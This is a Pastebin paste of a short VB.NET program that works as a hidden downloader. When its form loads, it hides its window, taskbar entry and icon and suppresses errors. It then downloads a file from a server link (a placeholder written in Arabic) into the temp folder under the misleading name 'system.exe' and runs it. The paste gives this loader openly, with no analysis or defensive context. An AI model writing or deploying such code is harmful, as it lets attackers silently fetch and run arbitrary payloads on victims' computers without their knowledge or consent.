Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Imports System.Net
- Public Class Form1
- Private Sub Form1_Load(ByVal sender As Object, ByVal e As EventArgs) Handles MyBase.Load
- On Error Resume Next
- Me.Hide()
- Me.ShowInTaskbar = False
- Me.ShowIcon = False
- lol()
- End Sub
- Function lol()
- On Error Resume Next
- Using wc = New WebClient()
- wc.DownloadFile("رابط السيرفر مباشر", Environ("temp") & "\system.exe")
- Process.Start(Environ("temp") & "\system.exe")
- End Using
- End Function
- End Class
Add Comment
Please, Sign In to add comment